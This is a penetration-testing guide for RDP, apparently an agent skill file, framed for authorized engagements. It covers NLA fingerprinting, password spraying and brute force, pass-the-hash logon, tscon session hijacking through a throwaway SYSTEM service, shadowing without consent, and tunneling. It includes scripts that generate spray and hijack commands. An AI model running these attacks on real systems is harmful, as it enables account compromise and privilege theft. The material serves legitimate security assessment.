---
name: pentesting-rdp
description: Testing the Remote Desktop Protocol (RDP, 3389/tcp ms-wbt-server) during authorized engagements. Covers encryption/NLA fingerprinting and NTLM info with nmap NSE, credential validation and pre/post-auth screenshots with netexec, password brute force (mindful of lockout), pass-the-hash logon with xfreerdp, session hijacking via tscon, RDS shadowing, RDP tunneling, and BlueKeep (CVE-2019-0708) / MS12-020 awareness.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  - penetration-testing
  - network-services
  - rdp
  - windows
  - lateral-movement
  - session-hijacking
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting RDP (port 3389)

## When to Use
- During authorized assessments when TCP 3389 (ms-wbt-server) is open
- When fingerprinting the security layer (native RDP, TLS, CredSSP/NLA) and whether NLA is enforced
- When validating recovered credentials or NT hashes against RDP
- When you already hold a foothold and want to hijack or shadow an active session
- When assessing for BlueKeep (CVE-2019-0708) or MS12-020 on legacy hosts
## Quick Enumeration

```bash
# Encryption, DoS (MS12-020 safe check), and NTLM Windows info
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

# Security layer / NLA fingerprint only
nmap --script rdp-enum-encryption -p 3389 <IP>

# netexec quick auth check (the banner line also reports whether NLA is required)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot of the login screen (only possible when NLA is disabled)
nxc rdp <IP> --nla-screenshot
```
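What `rdp-enum-encryption` and the `nxc rdp` banner report comes from the X.224 connection negotiation: the client asks for one security protocol at a time (Standard RDP Security, TLS, CredSSP) and the server either selects it or answers with a failure code such as `HYBRID_REQUIRED_BY_SERVER`. The probe below is an added example, not code from this page, from nmap or from netexec; it speaks only that negotiation (no TLS handshake, no CredSSP), and the sample Connection Confirm packets are constructed to show what a hardened host and a pre-Vista host answer.

```python
"""Fingerprint the RDP security layer and NLA enforcement from the X.224 negotiation alone."""
import socket
import struct
import sys

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR RDP_NEG_REQ / RDP_NEG_RSP)
PROTOCOL_RDP = 0x00000000        # Standard RDP Security: no TLS, no NLA
PROTOCOL_SSL = 0x00000001        # TLS
PROTOCOL_HYBRID = 0x00000002     # CredSSP, i.e. NLA
PROTOCOL_NAMES = {PROTOCOL_RDP: "RDP", PROTOCOL_SSL: "TLS", PROTOCOL_HYBRID: "CredSSP/NLA"}

TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}

# Constructed sample Connection Confirms (not captured from a real host)
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed00000123400" "0300080005000000")  # NEG_FAILURE code 5
SAMPLE_SELECT_HYBRID = bytes.fromhex("030000130ed00000123400" "0200080002000000")  # NEG_RSP -> CredSSP
SAMPLE_SELECT_RDP = bytes.fromhex("030000130ed00000123400" "0200080000000000")     # NEG_RSP -> Standard RDP
SAMPLE_LEGACY = bytes.fromhex("0300000b06d00000123400")                             # bare CC, pre-Vista server


def build_connection_request(requested_protocols):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ for one protocol mask."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)  # type, flags, length, protocols
    x224 = struct.pack("!BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0)       # LI, CR code, dst-ref, src-ref, class
    body = x224 + neg_req
    return struct.pack("!BBH", 3, 0, 4 + len(body)) + body              # TPKT: version 3, reserved, length


def parse_connection_confirm(data):
    """Decode the server's X.224 Connection Confirm (with or without an RDP_NEG_RSP/FAILURE)."""
    if len(data) < 11 or data[0] != 0x03 or struct.unpack("!H", data[2:4])[0] != len(data):
        raise ValueError("not a complete TPKT packet")
    li, code = data[4], data[5]
    if code & 0xF0 != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if li == 6:  # no negotiation structure at all: pre-Vista server, Standard RDP Security only
        return {"result": "legacy", "selected_protocol": PROTOCOL_RDP, "failure": None}
    ntype, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
    if ntype == TYPE_RDP_NEG_RSP:
        return {"result": "ok", "selected_protocol": value, "failure": None}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"result": "failure", "selected_protocol": None,
                "failure": FAILURE_CODES.get(value, "UNKNOWN_%d" % value)}
    raise ValueError("unexpected negotiation type 0x%02x" % ntype)


def classify(results):
    """results: {requested mask: parsed confirm}. Decide what the security layer allows."""
    def accepted(mask):
        r = results[mask]
        if r["result"] == "legacy":
            return mask == PROTOCOL_RDP
        return r["result"] == "ok" and r["selected_protocol"] == mask

    def refused_needing_nla(mask):
        return results[mask]["failure"] == "HYBRID_REQUIRED_BY_SERVER"

    return {
        "supported": [PROTOCOL_NAMES[m] for m in PROTOCOL_NAMES if accepted(m)],
        # NLA enforced: both non-CredSSP requests are refused with HYBRID_REQUIRED_BY_SERVER
        "nla_required": refused_needing_nla(PROTOCOL_RDP) and refused_needing_nla(PROTOCOL_SSL),
        # Standard RDP Security accepted: login screen reachable pre-auth (nla-screenshot works,
        # and the host is a BlueKeep candidate if the OS is old enough)
        "legacy_rdp_allowed": accepted(PROTOCOL_RDP),
        "tls_required": results[PROTOCOL_RDP]["failure"] == "SSL_REQUIRED_BY_SERVER",
    }


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-packet")
        buf += chunk
    return buf


def probe(host, port=3389, timeout=5.0):
    """One fresh TCP connection per requested protocol, the way rdp-enum-encryption does it."""
    results = {}
    for mask in PROTOCOL_NAMES:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_connection_request(mask))
            header = _recv_exact(s, 4)
            total = struct.unpack("!H", header[2:4])[0]
            results[mask] = parse_connection_confirm(header + _recv_exact(s, total - 4))
    return classify(results)


if __name__ == "__main__":
    print(probe(sys.argv[1]))
```

Run it as `python3 rdp_neg.py <IP>`; `nla_required: True` means no pre-auth screenshot and no unauthenticated BlueKeep trigger, while `legacy_rdp_allowed: True` is the combination to chase. The probe only tells you which protocols the listener accepts; the OS version still has to come from `rdp-ntlm-info`.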
## Critical: Checks Most Often Missed

- **NLA disabled, pre-auth screenshot**: when Network Level Authentication is off, `nxc rdp <IP> --nla-screenshot` captures the login screen before any authentication and reveals logged-in usernames, the domain and host context.
- **BlueKeep (CVE-2019-0708)**: pre-auth, wormable RCE on legacy Windows (7 / Server 2008 R2 and older). NLA blocks unauthenticated exploitation, so the dangerous combination is legacy OS plus NLA off. Treat as critical; exploit only with explicit written authorization, because the public exploits can crash/BSOD the host.
- **MS12-020**: RDP DoS (and potential RCE) on older hosts. The nmap `rdp-vuln-ms12-020` script checks for it without triggering the DoS.
- **Session hijacking via tscon**: with SYSTEM you can attach to any user's existing RDP session without their password (`tscon <ID> /dest:<SESSIONNAME>`, where `<SESSIONNAME>` is the session you are currently in).
- **RDS shadowing**: if the shadow policy allows, view or control another user's session, sometimes without consent (`mstsc /shadow:<ID> /noconsentprompt /control`).
- **Weak / reused local admin creds + Restricted Admin**: pass-the-hash logon via `xfreerdp /pth:` works when Restricted Admin mode is enabled on the target (the `DisableRestrictedAdmin` value under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` set to 0); without it, the NT hash alone does not give an interactive desktop.

**How to CONFIRM**: NLA status is confirmed by `nmap --script rdp-enum-encryption` and by the `nxc rdp` banner. A valid credential is confirmed when `nxc rdp <IP> -u <user> -p <password>` shows `[+]` (and `(Pwn3d!)` for admin access). BlueKeep candidacy is indicated by a legacy OS plus NLA off; confirm only with an authorized, non-destructive checker.
## Workflow

### Step 1: Enumerate (security layer, NLA, NTLM info)

```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
# rdp-ntlm-info leaks: target name, NetBIOS/DNS computer & domain name, OS build
nxc rdp <IP>   # banner + NLA requirement
```
### Step 2: Authenticate (validate creds, brute force, PtH)

```bash
# Validate a single credential / hash
nxc rdp <IP> -u <user> -p <password>
nxc rdp <IP> -u <user> -H <NTHASH>
rdp_check.py <domain>/<user>:<password>@<IP>   # impacket credential check

# Brute force / spray. WARNING: can lock accounts; check the lockout policy first and coordinate with the client
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Password123'
hydra -L usernames.txt -p 'Password123' <IP> rdp

# Interactive logon
xfreerdp /u:<user> /p:<password> /v:<IP> [/d:domain]
xfreerdp /u:<user> /pth:<hash> /v:<IP> [/d:domain]   # pass-the-hash (target must have Restricted Admin enabled)
rdesktop -d <domain> -u <user> -p <password> <IP>    # older client; prefer xfreerdp when NLA is enforced
```
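The lockout warning above is only actionable if you know the policy. The script below is an added example, not part of the original page: it parses `net accounts` (or `net accounts /domain`) output, splits a password list into rounds that stay a margin below the lockout threshold, and renders each round as `nxc rdp` sprays with a sleep covering the observation window between rounds. The `net accounts` text, the host `10.0.0.5` and the password list are constructed. Fine-grained password policies (PSOs) bound to specific users or groups are not visible in `net accounts`, so check those separately before spraying privileged accounts.

```python
"""Plan a lockout-aware RDP password spray from `net accounts` output."""
import re

# Constructed sample of `net accounts /domain` output (not from a real engagement)
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""


def parse_lockout_policy(text):
    """Return (threshold, observation_window_minutes); threshold 0 means lockout is disabled ('Never')."""
    def field(label):
        m = re.search(r"^%s:\s*(\S+)" % re.escape(label), text, re.MULTILINE)
        if not m:
            raise ValueError("missing field: " + label)
        return m.group(1)
    raw = field("Lockout threshold")
    threshold = 0 if raw.lower() == "never" else int(raw)
    return threshold, int(field("Lockout observation window (minutes)"))


def spray_plan(threshold, window_minutes, passwords, safety_margin=2):
    """Split passwords into rounds of at most threshold - safety_margin attempts per user.

    The bad-password counter resets window_minutes after the last failed attempt, so every round
    except the last is followed by a wait of window_minutes + 1 before the same users are hit again.
    """
    passwords = list(passwords)
    if threshold == 0:
        return [{"passwords": passwords, "wait_minutes_after": 0}]
    per_round = threshold - safety_margin
    if per_round < 1:
        raise ValueError("threshold %d leaves no safe attempts with margin %d" % (threshold, safety_margin))
    chunks = [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]
    return [{"passwords": chunk, "wait_minutes_after": 0 if i == len(chunks) - 1 else window_minutes + 1}
            for i, chunk in enumerate(chunks)]


def nxc_commands(plan, host, userfile="users.txt"):
    """Render the plan as netexec sprays: one password per invocation against every user, sleeps between rounds."""
    cmds = []
    for rnd in plan:
        for pw in rnd["passwords"]:
            cmds.append("nxc rdp %s -u %s -p '%s'" % (host, userfile, pw.replace("'", "'\\''")))
        if rnd["wait_minutes_after"]:
            cmds.append("sleep %d" % (rnd["wait_minutes_after"] * 60))
    return cmds


if __name__ == "__main__":
    threshold, window = parse_lockout_policy(SAMPLE_NET_ACCOUNTS)
    plan = spray_plan(threshold, window, ["Winter2024!", "Spring2024!", "Welcome1", "Company1!"])
    for cmd in nxc_commands(plan, "10.0.0.5"):
        print(cmd)
```

With the sample policy (threshold 5, window 30) and margin 2, each user sees at most three failures per 31 minutes, so a wrong guess by the user themselves still leaves headroom. Lower the margin only with the client's agreement.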
### Step 3: Post-auth screenshot / verify access

```bash
# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot

# Add yourself to the RDP group if you have admin (post-exploitation; runs on the target, remove it again at the end)
net localgroup "Remote Desktop Users" <user> /add
```
### Step 4: Post-access / lateral movement (hijack, shadow, tunnel)

```bash
# Session hijacking: tscon must run as SYSTEM (e.g. from a service or psexec -s); no password needed
query user                         # list sessions + IDs; disconnected sessions show state "Disc"
tscon <ID> /dest:<SESSIONNAME>     # attach session <ID> to your own session name (from query user)
# mimikatz alternative:
# ts::sessions ; ts::remote /id:2

# RDS shadowing (view/control another session)
qwinsta /server:<IP>
mstsc /v:<IP> /shadow:<SESSION_ID> /control
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt   # only if policy allows
# Shadow policy value: 0 = disabled, 1 = full control with consent, 2 = full control without consent,
#                      3 = view with consent, 4 = view without consent (value absent = not set by policy)
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

# Pivot/tunnel TCP over an RDP virtual channel (rdp2tcp)
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

# Command exec without GUI / automation
# EvilRDP, SharpRDP: run shell/PowerShell, SOCKS proxy, clipboard, file transfer
```
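The hijack and shadow steps hinge on reading `query user` correctly (a disconnected session has an empty SESSIONNAME column, so a naive whitespace split shifts every field) and on decoding the Shadow policy value. The script below is an added example, not code from the page's tools: it parses a constructed `query user` and `reg query` output, emits a `tscon` line for every disconnected session attached to the session you are sitting in, wraps it in the usual throwaway service so it runs as SYSTEM (`sc create` / `net start`), and picks only the `mstsc /shadow` flags the policy permits. The service name `sesshijack`, the host `10.0.0.5` and the user names are assumptions.

```python
"""Triage `query user` output and the Shadow policy before hijacking or shadowing an RDP session."""
import re

# Constructed sample `query user` output from a jump host (not from a real engagement)
SAMPLE_QUERY_USER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>operator              rdp-tcp#0           2  Active          .  1/15/2024 9:02 AM
 da_backup                                 3  Disc         1:24  1/15/2024 7:45 AM
 svc_sql               console             1  Active       none  1/14/2024 11:10 PM
"""

# Constructed sample of: reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow
SAMPLE_REG_QUERY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services
    Shadow    REG_DWORD    0x2
"""

# A disconnected session has an empty SESSIONNAME column, which shifts the fields for a plain
# split(); the optional group absorbs that. '>' marks the session the command ran in.
_ROW = re.compile(r"^(?P<current>[> ])(?P<user>\S+)\s+(?:(?P<session>\S+)\s+)?(?P<id>\d+)\s+"
                  r"(?P<state>\S+)\s+(?P<idle>\S+)\s+(?P<logon>.+?)\s*$")

# Meaning of the Shadow policy DWORD
SHADOW_POLICY = {0: "no remote control allowed",
                 1: "full control, user consent required",
                 2: "full control, no consent needed",
                 3: "view only, user consent required",
                 4: "view only, no consent needed"}


def parse_query_user(text):
    sessions = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("USERNAME"):
            continue
        m = _ROW.match(line)
        if not m:
            raise ValueError("unparsed row: %r" % line)
        sessions.append({"user": m.group("user"), "session": m.group("session"),
                         "id": int(m.group("id")), "state": m.group("state"),
                         "idle": m.group("idle"), "current": m.group("current") == ">"})
    return sessions


def hijack_commands(sessions):
    """tscon line for every disconnected session, attaching it to the session we are sitting in."""
    mine = next(s for s in sessions if s["current"])
    return ["tscon %d /dest:%s" % (s["id"], mine["session"]) for s in sessions if s["state"] == "Disc"]


def run_as_system(command, service_name="sesshijack"):
    """Wrap a command in a throwaway service so it runs as SYSTEM, which tscon needs (assumed name).

    net start reports that the service did not respond in time; the wrapped command still runs.
    """
    return ['sc create %s binpath= "cmd.exe /k %s"' % (service_name, command),
            "net start %s" % service_name,
            "sc delete %s" % service_name]


def shadow_policy(reg_output):
    """Return (value, meaning); (None, ...) when the policy value is not set."""
    m = re.search(r"\bShadow\s+REG_DWORD\s+0x([0-9a-fA-F]+)", reg_output)
    if not m:
        return None, "Shadow policy not configured"
    value = int(m.group(1), 16)
    return value, SHADOW_POLICY.get(value, "unknown value %d" % value)


def shadow_command(session_id, host, policy_value):
    """mstsc line with only the flags the policy permits; None when remote control is disabled."""
    if policy_value == 0:
        return None
    cmd = "mstsc /v:%s /shadow:%d" % (host, session_id)
    if policy_value in (1, 2, None):   # not configured: ask for control and expect a consent prompt
        cmd += " /control"
    if policy_value in (2, 4):
        cmd += " /noConsentPrompt"
    return cmd


if __name__ == "__main__":
    sessions = parse_query_user(SAMPLE_QUERY_USER)
    for line in hijack_commands(sessions):
        print("\n".join(run_as_system(line)))
    value, meaning = shadow_policy(SAMPLE_REG_QUERY)
    print(meaning, "->", shadow_command(3, "10.0.0.5", value))
```

On the sample data the only candidate is `da_backup` (ID 3, state Disc), so the output is the three service lines around `tscon 3 /dest:rdp-tcp#0`, and the Shadow value 2 yields a `/control /noConsentPrompt` shadow command. Hijacking an Active session kicks the user to the lock screen, which is why only Disc sessions are selected.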
## Key Concepts

| Concept | Description |
|---|---|
| RDP | Microsoft's graphical remote desktop protocol on TCP 3389 |
| NLA (CredSSP) | Network Level Authentication; the user authenticates over CredSSP before the server creates a session or shows the login screen |
| Security layer | Negotiated as native RDP, TLS, or CredSSP/NLA |
| Restricted Admin mode | Allows pass-the-hash RDP logon without sending a cleartext password |
| Session hijacking (tscon) | Attaching to another user's session as SYSTEM without their password |
| RDS shadowing | Viewing/controlling another user's active session via mstsc |
| BlueKeep (CVE-2019-0708) | Pre-auth wormable RCE in legacy RDP |
| MS12-020 | RDP vulnerability allowing DoS / potential RCE on older hosts |
## Tools & Systems

| Tool | Purpose |
|---|---|
| nmap (rdp-* NSE) | Encryption, NLA, NTLM info, MS12-020 check |
| netexec / crackmapexec (rdp) | Credential check, NLA detection, pre/post-auth screenshots |
| xfreerdp / rdesktop | Interactive logon, pass-the-hash, rdp2tcp tunneling |
| impacket rdp_check.py | Validate credentials against RDP |
| crowbar / hydra | RDP brute force (lockout-aware) |
| mstsc / tscon / qwinsta | Native session listing, hijacking, shadowing |
| EvilRDP / SharpRDP | Automated command execution and clipboard/file abuse over RDP |
## Common Scenarios

### Scenario 1: NLA Disabled Recon
`nxc rdp <IP> --nla-screenshot` captures the login screen pre-auth, revealing the logged-in user and domain, which informs targeted credential attacks.

### Scenario 2: Pass-the-Hash Logon
A recovered local admin NT hash works with `xfreerdp /pth:` because Restricted Admin mode is enabled on the target, granting an interactive desktop without cracking the password.

### Scenario 3: Session Hijacking
After gaining SYSTEM on a jump host, `query user` shows a Domain Admin's disconnected session; `tscon <ID> /dest:rdp-tcp#0` (with `rdp-tcp#0` being your own session) takes it over, inheriting their privileges without a password.

### Scenario 4: BlueKeep Exposure
`rdp-ntlm-info` shows Windows Server 2008 R2 and `rdp-enum-encryption` shows NLA off. The host is flagged as a critical BlueKeep candidate and reported; exploitation proceeds only with written authorization in a maintenance window.
## Output Format

```markdown
## RDP Finding
**Service**: Remote Desktop Protocol
**Severity**: <Critical|High|Medium>
**Host**: <IP>:3389
**NLA**: <enabled|disabled> **OS**: <from rdp-ntlm-info>
### Summary
<What was found: weak creds, NLA off, BlueKeep candidate, session hijack, shadowing>
### Evidence
- Command: <nmap / nxc / xfreerdp>
- Output: <NLA status, [+] / (Pwn3d!), screenshot path, vuln verdict>
### Access Obtained
| Method | Result |
|--------|--------|
| xfreerdp PtH | interactive desktop as <user> |
| tscon hijack | inherited <DomainAdmin> session |
### Recommendation
1. Require Network Level Authentication (NLA) on all RDP hosts
2. Patch BlueKeep (CVE-2019-0708) and MS12-020; decommission legacy OS
3. Restrict RDP to VPN/jump hosts and enforce MFA
4. Disable RDS shadowing without consent; audit the Shadow policy value
5. Enforce strong, unique credentials and account lockout thresholds
```